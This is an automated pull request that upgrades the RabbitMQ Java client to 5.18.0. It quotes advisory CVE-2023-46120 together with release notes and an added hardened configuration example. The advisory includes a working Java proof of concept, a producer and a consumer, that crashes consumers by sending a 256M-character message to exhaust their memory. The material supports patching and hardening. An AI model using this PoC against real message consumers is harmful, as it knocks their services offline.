This PR contains the following updates: `com.rabbitmq:amqp-client` `5.16.0` -> `5.18.0`.

### GitHub Vulnerability Alerts

#### CVE-2023-46120

### Summary
`maxBodyLength` was not enforced when receiving Message objects. An attacker who can publish to a queue the client consumes from can send a very large message; the client buffers the entire body in memory before handing it to the application, exhausting the consumer's heap and triggering an `OutOfMemoryError`.
### PoC
#### RabbitMQ
Use RabbitMQ 3.11.16 as the broker and raise its `max_message_size` to 512M, the largest value the broker accepts. The broker limit only needs to exceed the consumer's heap; it has to be raised because the broker's default (128 MiB) would refuse the 256M message below at publish time. Note that this broker setting is the only check between the publisher and the consumer's memory: the client itself enforces nothing.
Start RabbitMQ
#### Producer
Build a String of length 256M (2^28 characters) and send it to the Consumer. The Producer JVM must have a heap comfortably larger than the string (raise `-Xmx` if it fails); only the Consumer is meant to run short of memory.
```java
package org.springframework.amqp.helloworld;

import org.springframework.amqp.core.AmqpTemplate;
import org.springframework.context.ApplicationContext;
import org.springframework.context.annotation.AnnotationConfigApplicationContext;

public class Producer {
    public static void main(String[] args) {
        // HelloWorldConfiguration is the Spring AMQP helloworld sample configuration (not shown on this page)
        ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);
        AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class);
        // Doubling 28 times turns one character into 2^28 = 256M characters
        String s = "A";
        for (int i = 0; i < 28; ++i) {
            s = s + s;
            System.out.println(i);
        }
        amqpTemplate.convertAndSend(s);
        System.out.println("Send Finish");
    }
}
```
#### Consumer
Receive one message and convert it to a String. Before the fix the client buffers the whole body as it arrives, so a Consumer whose heap is smaller than the body runs out of memory while the client reads the message in, before `receiveAndConvert` ever returns.
```java
package org.springframework.amqp.helloworld;

import org.springframework.amqp.core.AmqpTemplate;
import org.springframework.context.ApplicationContext;
import org.springframework.context.annotation.AnnotationConfigApplicationContext;

public class Consumer {
    public static void main(String[] args) {
        ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);
        AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class);
        // Pulls one message from the template's default receive queue
        Object o = amqpTemplate.receiveAndConvert();
        if (o != null) {
            String s = o.toString();
            System.out.println("Received Length : " + s.length());
        } else {
            System.out.println("null");
        }
    }
}
```
#### Results
* Run the Producer first, then the Consumer
* The Consumer, run with a heap smaller than the message body, dies with `java.lang.OutOfMemoryError` while the client buffers the incoming body
### Impact
Applications built on the RabbitMQ Java client can be denied service by any peer able to publish to a queue they consume from: a single oversized message exhausts the consumer's memory and crashes the consuming JVM.
---
### Release Notes
<details>
<summary>rabbitmq/rabbitmq-java-client (com.rabbitmq:amqp-client)</summary>
### [`v5.18.0`](https://togithub.com/rabbitmq/rabbitmq-java-client/releases/tag/v5.18.0)
[Compare Source](https://togithub.com/rabbitmq/rabbitmq-java-client/compare/v5.17.1...v5.18.0)
### Changes between 5.17.0 and 5.18.0
This is a minor release with usability improvements and dependency upgrades. It is compatible with 5.17.x. All users of the 5.x.x series are encouraged to upgrade.
Inbound message size is now enforced, with the default limit being 64 MiB.
Thanks to [@JHahnHRO](https://togithub.com/JHahnHRO) and Sérgio Faria ([@sergio91pt](https://togithub.com/sergio91pt)) for their contribution.
#### Add ability to specify maximum message size
GitHub issue: [#1062](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/1062)
#### Do not confirmSelect more than once per channel
GitHub PR: [#1057](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/1057)
#### Make RpcClient (Auto)Closeable
GitHub issue: [#1032](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/1032)
#### Bump dependencies
GitHub issue: [#999](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/999)
### Dependency
#### Maven
```xml
<dependency>
<groupId>com.rabbitmq</groupId>
<artifactId>amqp-client</artifactId>
<version>5.18.0</version>
</dependency>
```
#### Gradle
```groovy
implementation 'com.rabbitmq:amqp-client:5.18.0'
```
### [`v5.17.1`](https://togithub.com/rabbitmq/rabbitmq-java-client/releases/tag/v5.17.1)
[Compare Source](https://togithub.com/rabbitmq/rabbitmq-java-client/compare/v5.17.0...v5.17.1)
### Changes between 5.17.0 and 5.17.1
This is a minor release with a usability improvement. It is compatible with 5.17.0.
Inbound message size is now enforced, with the default limit being 64 MiB.
#### Add ability to specify maximum message size
GitHub issue: [#1062](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/1062)
### [`v5.17.0`](https://togithub.com/rabbitmq/rabbitmq-java-client/releases/tag/v5.17.0)
[Compare Source](https://togithub.com/rabbitmq/rabbitmq-java-client/compare/v5.16.1...v5.17.0)
### Changes between 5.16.0 and 5.17.0
This is a minor release with bug fixes, usability improvements, and dependency upgrades. It is compatible with 5.16.x. All users of the 5.x.x series are encouraged to upgrade.
Thanks to Nikita Nefedov ([@nikita2206](https://togithub.com/nikita2206)) for his contribution.
#### Remove hard dependency on Jackson in OAuth 2 support
GitHub PR: [#969](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/969)
#### NPE in `AbstractMetricsCollector` when channel limit is exceeded
GitHub issue: [#944](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/944)
#### Report publish failures for the closed channel as well
GitHub PR: [#943](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/943)
#### Remove dependency on java.sql.Timestamp
GitHub PR: [#878](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/878)
#### Bump dependencies
GitHub issue: [#848](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/848)
### Dependency
#### Maven
```xml
<dependency>
<groupId>com.rabbitmq</groupId>
<artifactId>amqp-client</artifactId>
<version>5.17.0</version>
</dependency>
```
#### Gradle
```groovy
implementation 'com.rabbitmq:amqp-client:5.17.0'
```
### [`v5.16.1`](https://togithub.com/rabbitmq/rabbitmq-java-client/releases/tag/v5.16.1)
[Compare Source](https://togithub.com/rabbitmq/rabbitmq-java-client/compare/v5.16.0...v5.16.1)
### Changes between 5.16.0 and 5.16.1
This is a minor release with a usability improvement. It is compatible with 5.16.0.
Inbound message size is now enforced, with the default limit being 64 MiB.
#### Add ability to specify maximum message size
GitHub issue: [#1062](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/1062)
</details>
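The 5.18.0, 5.17.1 and 5.16.1 notes above all describe the same fix: inbound message size is enforced with a 64 MiB default, and the limit is configurable (issue #1062). The Spring configuration below is an added example, not code from this page, the advisory or the rabbitmq-java-client project. It puts the weak form the PoC relies on beside a hardened form that sets an application-specific limit through `ConnectionFactory#setMaxInboundMessageBodySize`, the setter the 5.18.0 client exposes for this; that method name is taken from the client API rather than from this page, and the `HardenedConfiguration` class, the queue name `helloworld.q` and the 16 MiB figure are assumptions of the example.

```java
package org.springframework.amqp.helloworld;

import com.rabbitmq.client.ConnectionFactory;
import org.springframework.amqp.core.Queue;
import org.springframework.amqp.rabbit.connection.CachingConnectionFactory;
import org.springframework.amqp.rabbit.core.RabbitTemplate;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;

/**
 * Added example (not the page's or the project's code): a drop-in replacement for the
 * sample's HelloWorldConfiguration whose RabbitMQ connection carries an explicit
 * inbound body limit. Requires amqp-client 5.18.0 (or the 5.17.1 / 5.16.1 backports).
 */
@Configuration
public class HardenedConfiguration {

    // Assumed queue name; the sample's own queue name is not shown on this page.
    static final String QUEUE_NAME = "helloworld.q";

    // Application-specific ceiling. Derive it from the largest payload the consumer
    // legitimately handles, not from the heap size; 16 MiB here is an assumption.
    static final int MAX_INBOUND_BODY_BYTES = 16 * 1024 * 1024;

    @Bean
    public CachingConnectionFactory connectionFactory() {
        // Weak form (what the PoC depends on): the sample's one-liner
        //   return new CachingConnectionFactory("localhost");
        // leaves the client limit at its default: none before the fix, 64 MiB from
        // 5.18.0 on, which is still more than a small consumer heap can absorb.

        // Hardened form: build the underlying client factory explicitly and cap it.
        ConnectionFactory rabbit = new ConnectionFactory();
        rabbit.setHost("localhost");
        rabbit.setMaxInboundMessageBodySize(MAX_INBOUND_BODY_BYTES);
        return new CachingConnectionFactory(rabbit);
    }

    @Bean
    public RabbitTemplate rabbitTemplate(CachingConnectionFactory connectionFactory) {
        RabbitTemplate template = new RabbitTemplate(connectionFactory);
        template.setRoutingKey(QUEUE_NAME);
        template.setDefaultReceiveQueue(QUEUE_NAME);
        return template;
    }

    @Bean
    public Queue helloWorldQueue() {
        return new Queue(QUEUE_NAME);
    }
}
```

With this configuration the Consumer from the PoC no longer buffers a 256M body: the client rejects a message whose body exceeds the limit instead of handing it to the application. Two caveats. The exact failure the application observes (exception type, whether the connection is closed) is client behaviour to confirm against the version you ship, since the page does not state it. And the client-side limit complements rather than replaces the broker's `max_message_size`, which the PoC had to raise to 512M to get the message through at all; lowering that setting rejects oversized messages at publish time for every consumer of that broker, while the client limit also protects a consumer against a misconfigured or hostile broker.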
---
### Configuration
📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
This PR has been generated by Mend Renovate.